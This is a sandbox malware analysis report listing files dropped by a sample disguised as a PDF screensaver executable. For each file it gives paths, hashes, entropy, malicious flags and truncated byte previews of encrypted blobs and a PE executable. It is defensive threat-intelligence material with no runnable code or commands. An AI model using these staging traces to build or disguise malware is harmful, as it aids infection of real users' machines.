Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 044f.pdf.exe, Detection: malicious, Browse Filename: BNJ922u7IU.exe, Detection: malicious, Browse Filename: BNJ922u7IU.exe, Detection: malicious, Browse Filename: OtherBahamas.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: ExeFile (236).exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Gen.Variant.Nemesis.32879.26297.16830.exe, Detection: malicious, Browse Filename: dUJqAYctYk.exe, Detection: malicious, Browse Filename: NervousGrammar.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\EchoArtisan Technologies\K

Download File

Process:	C:\Users\user\AppData\Local\Temp\186040\Tracks.pif
File Type:	data
Category:	dropped
Size (bytes):	2148024
Entropy (8bit):	7.999920200203836
Encrypted:	true
SSDEEP:	49152:PCIz48D6Y/TPx1WGEpZOGk7kcLKXoSpeFHDhJrQJEV:PXD6CEp3k7kcLJSpmhzV
MD5:	B9586122BDF0187CF4764AB1094D86B6
SHA1:	14D3CDD0350DED70287F5231194BAC85F90F0941
SHA-256:	E87AC417D2EF91B903903033C9AEFF31DF705C977C14485D6453F6A094A01375
SHA-512:	98F274907F71E9A7358AE53A367CE9C59B73B102AE434C5D3AFBF9A48A60D52B48136BB1F8A7E5F1E0CE74F68AC9E1D527A1CF6CEBE2DC973570CAC1ACF272E9
Malicious:	true
Preview:	./.c...s.X.d..1(b&G.0Ce.b.A..rj....3.5..6......,.CQh.m.5Lp.;..Y..5..q....q........&c..)..D.eX..y$sc%...2......C.(.%2L..pu.RLgDob.i.E.\|....Mp-...../..F.v..!........>......HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...4.F.'.F...h.............X5..e\|..X5..e\|..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..r.$..,P..Myn.2..t.W.....C ...W....X5..:.{.X5..e\|..m...........5...x..2).U.j.....>.P#.~...j..(....M.a....u-....<X....O....rm...t.'...._...\....)Z.f.\|.:.N..%.8.x,.......f.m(......A..W...0...u.}..I].].7"/pS).. ..>.....2......>>>.C.<^.y...D.(.O.?..~..{..0..x].{.B5V....'.X&.....Y.h....B..0....+......(gxr..Ze....T.t:"......\|...Li._...1/ z..Ns.H.f..BP.C..\|..?.y-...k..".O.K.l

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.350509596383769
Encrypted:	false
SSDEEP:	24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKnYHKh3oPtHo6hAHKzeR
MD5:	B6D3844EAA406C781DC083A57D80B31D
SHA1:	A86C11005B4765CF80CE96F09686B601DD3F87D7
SHA-256:	FC52CE6F1AE1858EFB752C50FD39D3FD82CC2605B95E94B9C16FB9220BC25D20
SHA-512:	08CD3FFA613D2A95564DFEBBE5C9CFB3CA7B903BAF0F1105AECB039420C9126B06A1CA6D7DA562F18DB1C28B4877D84C98AE74C7AB4799DE8B8C5381F4390462
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\winservices.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\winservices.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	841
Entropy (8bit):	5.351831766340675
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoIvEE4xDqE4j:MxHKlYHKh3oPtHo6wvEHxDqHj
MD5:	98DCC730A3C77DCDCA7CD8717EB5D42A
SHA1:	639509210C17EB73F5DB581FA8CA46B1157D8806
SHA-256:	E3C80885BCC7FE4F349EFB0470D261E0DE273EE26D47AF09C79F1B4B2F891E49
SHA-512:	7D11C53167839D428DAE35BF759C73FC0C7C49F2DE35CC99E4F8B69CDD40DFBEEF6D355F15FAB1EED62A64AF94E7BA311C0F8E07C3DA6F3A63410CC3E9882B78
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\186040\L

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	2148024
Entropy (8bit):	7.999920200203836
Encrypted:	true
SSDEEP:	49152:PCIz48D6Y/TPx1WGEpZOGk7kcLKXoSpeFHDhJrQJEV:PXD6CEp3k7kcLJSpmhzV
MD5:	B9586122BDF0187CF4764AB1094D86B6
SHA1:	14D3CDD0350DED70287F5231194BAC85F90F0941
SHA-256:	E87AC417D2EF91B903903033C9AEFF31DF705C977C14485D6453F6A094A01375
SHA-512:	98F274907F71E9A7358AE53A367CE9C59B73B102AE434C5D3AFBF9A48A60D52B48136BB1F8A7E5F1E0CE74F68AC9E1D527A1CF6CEBE2DC973570CAC1ACF272E9
Malicious:	true
Preview:	./.c...s.X.d..1(b&G.0Ce.b.A..rj....3.5..6......,.CQh.m.5Lp.;..Y..5..q....q........&c..)..D.eX..y$sc%...2......C.(.%2L..pu.RLgDob.i.E.\|....Mp-...../..F.v..!........>......HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...4.F.'.F...h.............X5..e\|..X5..e\|..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..r.$..,P..Myn.2..t.W.....C ...W....X5..:.{.X5..e\|..m...........5...x..2).U.j.....>.P#.~...j..(....M.a....u-....<X....O....rm...t.'...._...\....)Z.f.\|.:.N..%.8.x,.......f.m(......A..W...0...u.}..I].].7"/pS).. ..>.....2......>>>.C.<^.y...D.(.O.?..~..{..0..x].{.B5V....'.X&.....Y.h....B..0....+......(gxr..Ze....T.t:"......\|...Li._...1/ z..Ns.H.f..BP.C..\|..?.y-...k..".O.K.l

C:\Users\user\AppData\Local\Temp\186040\Tracks.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	943784
Entropy (8bit):	6.625461630496363
Encrypted:	false
SSDEEP:	24576:FJs7DlG83U/hcSO3UTyYPeuZtxY+8aiB8ea:FC7hGOSPT/PxebaiO
MD5:	78BA0653A340BAC5FF152B21A83626CC
SHA1:	B12DA9CB5D024555405040E65AD89D16AE749502
SHA-256:	05D8CF394190F3A707ABFB25FB44D7DA9D5F533D7D2063B23C00CC11253C8BE7
SHA-512:	EFB75E4C1E0057FFB47613FD5AAE8CE3912B1558A4B74DBF5284C942EAC78ECD9ACA98F7C1E0E96EC38E8177E58FFDF54F2EB0385E73EEF39E8A2CE611237317
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L...!..^.........."...............................@.......................................@...@.......@........................\|....P..h............J.......0..@v...........................C..........@............................................text...%........................... ..`.rdata..............................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..@v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Aboriginal

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	78848
Entropy (8bit):	7.997607656959269
Encrypted:	true
SSDEEP:	1536:AaQvNA2sEzL/qR5C3Zo/gmOKG4+99vNfb5Fy/vollu5faYg7zfuG:AaoNfPqRE3+/gmLGV9LFo/volyCfb
MD5:	7AB5890B2C3D1005C28C835CB3028E24
SHA1:	192566F40C73BF626827202702498C26C5EDFCDA
SHA-256:	A749362CD7DB4197B678ABB7966888748F560D62BA4CC1DE6423C5BC7C006794
SHA-512:	5F1993BB56E75752946557ABEB07D6F4E02CD508FACD4DAFA9E1BEDCBDF4807635D55E87FE2889B913C42C38D51B223EF7B8EA118F91633C307521F38BB17569
Malicious:	true
Preview:	E.]......?../k..!...(.".m.j...m.f...n..y.j.i..P#ZM.9.'`)B$........tL.."mD5..}....5t.#:...../J{.Z...y...........h.._?.+..F....{Y.7..P..g......u.5bx...0....I.......].9..P.^.......(...yQ.(5.....7M$.,.....p.....D..{.N^.^..3<.!...#..9.ld......6../.N.S..<:...Z. ......pA..J#.....c..&..I..N~...[L..R.g.+.';......8..d.Fi.......CjR.Y...a.q..}.....{...d..n....Z.T...D>.l.='..l-....W!'...$J.N(w.A.50.h...../.......!.r...i.)..K.7..=..\..vn_s...gG..S.v..4.....CX........'..`.....?..'W.y.l..<V~O.....x.f.b....m......t/$7u.{...{4.H;......ub.H.r..Ky..2....{..\^..(.....7...x..7.,...C...!.;..s.7'.m.eN\|NJ.m.p...._.7.....D22..y.Ah.lH.6.&..M...&>.....?r.j.x....{wW...C........'...DI..*.....<.nF..?.x...0,6.:f....Lq..y~c..Z7.3e.H..26..F.\......k..S.2d...${k.x&;..i..$....Fs.+..`c.....\.D..b.4od./..`>P.tG.}F....V.IplR....p.fte.[q.....'Q?.`&....TQ...)XvtA ?y.....!.~....U..q8..O.I7[..%...$.#..X...6"l^.c....)......o..\|A!O..<P..YWFz.H}.a.A.`xs......]..S.Y.'v....Kb..z.\|..&,...j03.

C:\Users\user\AppData\Local\Temp\Amazon

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.998090179151387
Encrypted:	true
SSDEEP:	1536:1A73zounabgkyN7E/vejJdUCZOVSfxyIQ0KMpXYFFVJocWI+u0BxzDiki8XEQGu:G3zGcHy/srp1np6FXSdQMGu
MD5:	EB647FF6DC919549935F3CBE209DABB6
SHA1:	D06A5E76C060B18FFA920E871B609464457772E6
SHA-256:	8D74444489ACB94AA0CE525F04B3A8DC6AF5748AFC9FCA0B9A70102B86950036
SHA-512:	3493AD2670B0F698DE3258A885E14FB04B3D651232A85F561DE683AC5283AE42D6801110447623779942D4B5FBFA4D058403D50CE5CAA7460F321F2B915294C5
Malicious:	true
Preview:	2...]o.i...Hm....B.,....h.N..d...."...0.U..\|....D..b...7..p.sF7..B...G.( ...........x...o5m.b...g./....g...&..T.O.....j............;V<G.\|...~.uS.....=.......8.T3.=.:.@._?......;q..-V...s..4.5..I.......?..Qg...i?...RF...Fi..t..........!UPqEe~w8.UD@.......a.S....!A..V....(:N.......X..#.V.(..$>.#..$.9.....9.SH..Lh..../l.m{..........@Teo.a\g..'....=...i...es.:.q ..'.K..E...u..,.Q._..7.@.+.6.jB...$....(n.P.^.....)..3..8.H{.h.Ri..y'..w=NX.......r.0.r..].[H.i...G.3..........._.....~....k........qQ>%yp........T.R....%.$.!......^.%....8.z.p...%Z..A.....P..''.-..r....&...r.e....X....E..P..ju...>.Q.uZ.l.J...o.Z.Y.$.. XjDS..n..?!0o...~^$.:{8.2S.^NS..U.-..N...m5..j.GQ!L.._.....".!....X.o"g.z..S&.qR.d.E..wQ.!.\7...(/.8......z.........w.9..a....`....E.VBRI.......e.K..U.bX...z&.2..A............T.....T..q).......}...e....i\..5..P.]ek.~.y.0f.\'..pi.2..i...._..`...Q.t^.\....y.k....}...M)E]A's..N2.......=.D...eW.....CI:.1rCZ'..D.F..L..D..{....>53 .

C:\Users\user\AppData\Local\Temp\Brain

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	95232
Entropy (8bit):	7.99781702848559
Encrypted:	true
SSDEEP:	1536:tgEoyRVsraGJVXj7s4CwzxcUz2+oQ4RfZigYDHIcJoz4px3qwbGla4MQw6WH0dc:SCRVsmKw4CA2+ojfZMzIcJoQqwil2FX
MD5:	2D9E36C8C1B9F4C37D96FD5ED70C30CD
SHA1:	62FC604B58E51FBE1B7CF5185779AB645C5AE73C
SHA-256:	F53808FB75CA0103B87A4AD30E493ECF6504744E52A92A55B255A0D5B648F1C8
SHA-512:	2487EC445644A03CFD51F292D7BDD3635C82563042E1583A68A8440A6FBC09342F052ABDDEFEFFF9112839B54C07C3342EEFC4C980E621E2F970A3E0B09D2EBD
Malicious:	true
Preview:	a....SN.......%.sc.m.(...X..T..d........Lv..t. ../S.....t").3....eo...p.....^.[.fP..jp.....<j..wS...~...r..l.'..{0.Y.7..{.....-.....9~V....._A.r...5....S/L.eU.H...@X.[....o.`.....G...t..c...0.3X...[4l.l.....6..T].rl..D<..-d.....t..L...DT..6..I{.{......0....j..io..}...`W......s......_."=.b.*.^%/..s.ynL....$R..v=...k@..+..U.=(.T.n.''....i..Y.D....\|..T.v.<3...P.Y0..9. .j.(Q......<.)r\|?q..C.Qv..HN.:.&D....g......m..=.".n].....Eu....;..m...1X2.u...o.......I.sm.........:...._.W....f=....o.%. .o..V .jb...e...':=]..8....L.\.^............Y.2........Y.......\|.W...<...o..U.........0`u...h).r.Q.2A,}.q"W.x.F$J...u..~..G.R.g>7........_-.C8=......xFQ=.C.R......qc..^.V.....4.C.oV.....r.(:..:L`..A.[.k..NC...E....i......F..3......(....s..p..H.i'. .....f..Q....g.......z=..vP..4hq.C...$.w{z..V...%z..-.O..b.P...r.....j/..........3..i.,...{p..s..Q..N?..e..tv..v..&....L'...\|6.C:.s...p=.R...@.c.8..{:MS...R..>.B...y.].,6&.6.PL.f.\|.V..]+_^S.6/..

C:\Users\user\AppData\Local\Temp\Cinema

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	19128
Entropy (8bit):	7.9910605841677596
Encrypted:	true
SSDEEP:	384:DkHmgROQgqzrzXku7yQxXb+CUUxyq/7Q8V6PsQLQPkBBP4gh9:ImxQL0u5L+CjxyivkPsb4Bw29
MD5:	5FFF72D3B82F077572E01EF4BEB21888
SHA1:	FA14A33F0B04B9126E29431FAD8C4494ACC145EA
SHA-256:	49AB2CF269C14E143486C63E1C92731E856FF14DD1F64349BBE8DBF6C7E3BC96
SHA-512:	DC94A9988A850170D2C860A018734B801821C193F3E1B87DC33D3F30013E462298318B701A763B686BF83CADF65A5F372871557B48D9D17D946DC9DCEAA4FE50
Malicious:	true
Preview:	.:-.<...e@.`.Y..[....:.PM.5..W.kg...4..2..'.wq.D./l$..tC........j8.i.P..`...L..X..hWK...}.dr....+..M.....(.1N......... .zN...:.l.v...+...fFBb.5........e...Y.:.R.% ....R..#..r\...Vns.z...[h......`)r..).}.u.......;B./...Lj....S.R..8.s,:.E........Q..e.@....q.....Pa...'q&..Kw...{.....`.s...h.........Y9..R...>nT.....kr7..)+/.nv+.Wx........v.0......Z..._..c..s.[..y.&.........7.^..........U..........:.h......`...L..J.......9.e...A82.(\|O.........z\ ^..`?..EG......aO...r...wgtY.@.K...L.....w....Ou.5...T....^....\...=..;...$z6W.Q.X...=~.[....k.&.,.....K..d<..Hy.A..d..q.j%..e..a.......?.PH....9{..go......j.....9.....B...u\|..Itq.C.:..!..8..T..o...2....v..OoGK.h....$a. ....!...o^%..[J.)m..<.P....?2.Fe.J.-.OH.1^8A..{kq.r.......n%..).Ae.Ad..-....cWy.[^.xml.h..& .j.i.}vT.Q.30....!..&:.....o....s.h."E;!..0.R.PjsX.F.B.j~O...M...&......:>..[.A.i.[1.?..p?.D......(......GX. .l...RW@....A...t...@.....uOy.7/..K.b.k.W?.R.Lz..]2}}DD....".t...,..z.B..F.

C:\Users\user\AppData\Local\Temp\Colombia

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	7.99792446291234
Encrypted:	true
SSDEEP:	1536:QSOq3w/yKp2+b+lF6PGDxY0sD00xCWpXxaM5DR/TLk/AaFUjK7BySauFcJCrkRg:QSOFE6DH0sAWp1qVUj8ZalCrCg
MD5:	6515719027CC1F2ED807ED0A3F3F8C0C
SHA1:	3C962D8600B593D3F9B8058E978DDB76A251E176
SHA-256:	1DFA978E54CCDAED1552AFA966477D98110B5FB1926CFED050CA2513528BEAE3
SHA-512:	9D7DB5FBC727FEF6520017934B0A9BFF79AD8B32E4E97AF1653A7D1F25BDD6CA670FF985393FEDA35D01C5B097CA607B33983622389600B48B3AAD3EFF7CC97C
Malicious:	true
Preview:	+.J.5...2F...O9.MJ..A.z_.....)..._i.3..)1.d....G:4.Wf.c;..F...Y...U....e./.5.......R.I6...I.5t."+Y.Zo...A.P.VG..J.=)/.\p..{<.H.t=#2DI..Op.e.b..Q......b..NV]....7.w..R..9..n..~..F........MXCm..ui ....\|.~...e...')..3...JbA'.w.G....M.Z.c..e..$# .~"f.......k)p.<..T.^!....X9.Y@.7UYZ<...9WDX...T.....uc.....Jz.................n....; E.7..$.....Jn.:.t.A..L#...o6...'..U$.g(t..%..-.f'....7..1....k`4.d..)d...l...&..y.'.g~.S. .~./...B.R....."/T.Z.Y....f...K.c..b.eOq.....s\.0..j.7k...IC.X..q....... .7..[.#...#8.X..Fz].S..{wn....0P...JV.6.....v2..{..zY..Q...`..y...\k.Z.....3..8M.............V}.....o.4.nw3..<?P.k..m.....,..<'......f.I..}.C...9S......i.QOe...2.K..P..x-l9D4..!\|..Z2t....}....$....e.k)L.IW_...b..M.g.....!..%.8.\|&M...c...'..l[7foM....?...I./..i.Vyvk!4Aa........H....H.{.........{.H..TN.G...[n....~.\W~.z.....i..3.T......[5....S...or).N.....N.\|O.(..f..D4..=S.......?...3...E.I.......n....r\|......u-...o'+..m.-_........Cd..s...UCz..6...0.

C:\Users\user\AppData\Local\Temp\Constitution

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.997855427577289
Encrypted:	true
SSDEEP:	1536:bJCTCcGinHu0Ci/oMMoQXhMS1MkcnE9tXTzVq5:tGCcGiHu0CRMMafrKq5
MD5:	DE8E529C939F257F5FB44F918DF40A27
SHA1:	99A214CB643FBCE8E2FA066620F71A92A2B6A48C
SHA-256:	F12DE7F6C53EA7304E2110113063E930C22D991E386FC8DC5D7218BA7E922DE9
SHA-512:	87DE0EDEB63963F9332174555F3EDD499C6D47118682BE6DC27AA7CC84B94DBD833992BB2FF7BEDA0D5E59F2D3FEFFC21B79CD92C83D15FBB52FAED6571FECAA
Malicious:	true
Preview:	..zS..8. .......$.l}.9...&D. ..G..F......qJ..^.d^./w{..l5.......@..EI....Tt9?..W..6{.P.'n#+..ne..eJ.X..Q..#E....B..v.r7....5g7l/.04."3g).X.'V5~.M..0......B+......2>3...w...4\|...:.g..0...7.n.r.{.0....\|C)......n.....^........w...g......n.@......... y ....p$.My-..?.{.....Xp...+.ZR..D.$d.....".8.s.bA..s..zw?_.k{6...x......s..v...`.=(...`.. /.\|;jOG.SG'....5....`..<C....l....3*....cV..C...o..G........j..M.....3..].6..icA......e..f...R.S-...CyOS.B.f..?..U.a.K)....eCF..x......^D./..Ffr.:2(....b...;.[.,.>..lO......4.?.c..~..O9..R.....}..,........o........y.v.T...V.....r./.E.3s.T...qd0q.~.....[.6.........r...{@..gw......f...`g$.......jj.v.j#....6.......xj^P.mK..Hu..Z.Q......I7.s..3]w(..d.x."..+...F...S..%U.4..f...w..J..\|.l.9.MvID...f..m..OYjz@.2`.l.&).Vx...Qm.).&.p.......=3h.DD.F..x..H....&...iQ...B....%1........d.D..~.....G...v....U....d.~.....+.M......WpZs..\|T...fj.................}...O...>A.....Q.R#...M8..#)....E...g..a..U.;^.w..Y...

C:\Users\user\AppData\Local\Temp\Dame

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	7.99748681816428
Encrypted:	true
SSDEEP:	1536:4/o/On3TwWKqsJaOq540zemWCuOMu+1PGBE0VK+NCgJ3v:go/OnDwWKqsJC4GemWCzMuSeBhKACgJf
MD5:	B60A210A563020F6B385E5D9D2A5D48A
SHA1:	12C5FF09E31223125CF07D7E07493675F37ABB77
SHA-256:	804D9CBA05BDE7FADB13557D754C0B4A94F1304796D7F1184D6B2945D5468428
SHA-512:	EED1B684A95144BADD207C32CE06993F7063B16BA4FB68D3D2D70567938F408CFA143AE3D09440986064BC060A80C32331F86CD300B6BE83648C6F97071A94B8
Malicious:	true
Preview:	...H..+.E.{.H..v.d.Ml...O...H......O..o....;.x....EI....=w....pv/.s.M.~r..$&%q....{u...."....j..!5.}."K.W.i/..o3.......n...%.?....@.@e5.......6........;..9....Y}.bJ..........).......(........n.C.X...#..>.........6O(J's..Km.\...A...t{1m.8G......L..^.},Z......D..j.h!n.....Z7..o...m.v.q%.:.G....?4.,...C....0b.k.lNU-r.#.V..t[K.$).p.-..........}..%.g...../uf.w.=H..T.Q./M.,.&...3..J......r..U..;........_....\.].r.%..E.}$...DBnRQ<].rg.Qc.[..n..n.me#./...RZ ....l........F.g'.$...C..U.........E&r7R.B.........P\.H..CS,.....,s?.n...>J..$..c....<.....<6...)..j.b.q...WE.Qd;..l..W=.?....j@......g.8.J... ..VW.&x..@x...7.H..../.<.x..g......V.....HE...k.[.1...H..e.......d..............U...)\L......I..KcM...".......TM+V......$D..2T.e....p'......O..mA..W.s..'.....E.5..9+[.[.k. ..z.%..C...^ZK..c.H.3.=!..(.r/;.FK]..I....;....Gq....&...i...M.y..D..h.C'.....{>..j.k...o]F@.N6.7.I_...<!_P.h.b.`..\|...,i..h.Z..d..u..........[..=;..h.w.=.,i......

C:\Users\user\AppData\Local\Temp\Eat

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.997993643886336
Encrypted:	true
SSDEEP:	1536:u9tHZqOaEzfoBR8BPx+TmUVovXLwwnZf73DwC3VNxTETaNUb1RzSLktG5:u7clzrkx+TmiovbjZf7XVNx8be0u
MD5:	566B1C377ACC552CD1DFCCAC12B76864
SHA1:	BE3C712FB4FAB2F8E1E2C8501E3F98A4B0C9EBA8
SHA-256:	52535FD7B193B6AF02EC9BAB6A9B1BA4C732DCE8B7752DF63FC5E843BD6D42CA
SHA-512:	684FDFE65C74C6D874BD8100A862183C68CCEA76AFF99F0C14AAF6B0689661FE35570411F4325DB60F3234221CB51DF58290BAEF1A6708D48C3069C34CCF8D39
Malicious:	true
Preview:	......\|...m...cf .=....g....^i.....#.f.~....J3.<..b........-..A..s...$0.....e.......].\|.B).0..9..w6FCj...V...o.. rj9.0.QD._.ye.&.OL..f\..].{R.Q.&ZG..w8(>.Cv".2<\|u1...#p......b.....(.?..Y../...5X...I.tl....K.....&.e.....z..$.EF...HIo...H=..R.T{.$.?..~i.(..1.....Z).nX!.......$..D...6.$q.:.v.&..2.2....Hc.4....A8~M..^..@Ak.2..{.j(.S..<....S.2..B.Xg..h.,..{.......Z.Bg.....n.ytf.Z..F.Z......c.pa..#.e...X....t..`.!.K.%.k"..P)I.A^..y......9...x.!&..<...p)s..AL..wn..{.{`n.UQqO.F.h..F.uo....`..>...a.o..6......Kp../y_.=f...i..axB....,P...,..V'K.....f.....2.x..o{.d~%...........I.E6^.]L&$.>.3..J.aF..vT..;.....u..R.."v..._G.@ 1.......k.T.a.q.r\P.D..U..a...>..`niL...]..1cF..xkG..2.,...cq;.=.v.J2gL.GL.%Yc9..$..p...JY.yx~j3.0.X...E.CM.....`,..,..././7........Im.?..F..R..*h....E\....o$0.X...opRF...8.E...B...1j.USk..D......NJ)..%.n..;Uv...z.......j.!..VW.2B..`....C.....=.g0W..-}.L....81.:.....d.a...m..e...I.v0..2......e...Yw&M.h^....._....-..z..8@x..Z..^

C:\Users\user\AppData\Local\Temp\Economic

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	7.998012558642757
Encrypted:	true
SSDEEP:	1536:do997qzMGyAQX7jHbB5JKlyoU3dMYC4+fTX3Oc0Zrr0nWFPQ:W97q/07BGla/L+T39Wf0nMQ
MD5:	5F7388B9727596FB03AE3D82E7F7D896
SHA1:	BF516F10CD9E29E8820AC1E3A52649842B2DBD9A
SHA-256:	E5F2629AF661686DFD66803C2E56E150EDD1058FB0D56042BD19C989F45BC4B4
SHA-512:	CB5CF2C053A7F712E165D184D57BF9C5495A9B99AB8354083966027EE155FD210596CB2378A906836A23F03131A58F04119DCF96A0C14A2FE25F2DEBE5D8508F
Malicious:	true
Preview:	X..ht..v...G.D.3Q....!_....a{.L.....p...S..['....tC...`..?..U.....l..z.:.ww.~.k.M.<}.)..}..#...iK.A..0........e..../@...>A_+....k..T..a.\|.,..+.Yr.Q\|.v3_..D.Ej.......L./..._$..P...xu..............O3P.,.g.f^.........A.Qz.U3..r.FIp0(....2..=......b..U...6....^u...L\/.......{.p...J.....f...$.zU......,.....<...X.z.u/B..a... ..d..^G.=.....}........;Q..G..C#{...........UF....JO>..o.\.IwB..K..}P....{M,...2.......6.&e.J...+x.:.'.Y..X.......M.>..F..?..4x.%~F.6......\|>+....w.....-;.Z..GY......<........&a9.Cy.....]..UI......kaE.{r...-..h..."...6mH#j9~.g=.....sg....Xh.)x..}..T.d........~.p;a.z,f......Wi.W...g.mC<m../.?.\^K.....f.Ck.&.UC..E.C..!6.!...&...j.I.....U..uh.......,9.Z.=..a... ..........?P/._.w..@.C.DrF.N!i.8;T3i.Q.M...6...t..$..d.c...+.!lV..3...Y.4.x./W)C.Im&....T..D...0.G'... .z.j..&.x",...d...E,M.@.l.^.%..Y^G..i.H1..?AgW@>.O..*..f0R......4=..~@W....j.@>..EVT.:p..q.w..K..Y.%%..+..idp.^DG^.c...#..8 A.w...-.x..kh... ...g.

C:\Users\user\AppData\Local\Temp\Enhancing

Download File

Process:	C:\Users\user\Desktop\nj230708full.pdf.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	101376
Entropy (8bit):	7.998091636604705
Encrypted:	true
SSDEEP:	3072:udZouH0hLrKvxdAtYRYVvlBVbz0jUVgINvyVeO:OghkxwVvlPzzVgINvxO
MD5:	2B92B119CCE7513B80C8F0851C286638
SHA1:	EA7DAD1F6590119D5B07D4D76C61E111B8921DFE
SHA-256:	4D8187A53D6FC2B4EB6D5C78F30980B953CF11E91279B1C5AC09D780142A9970
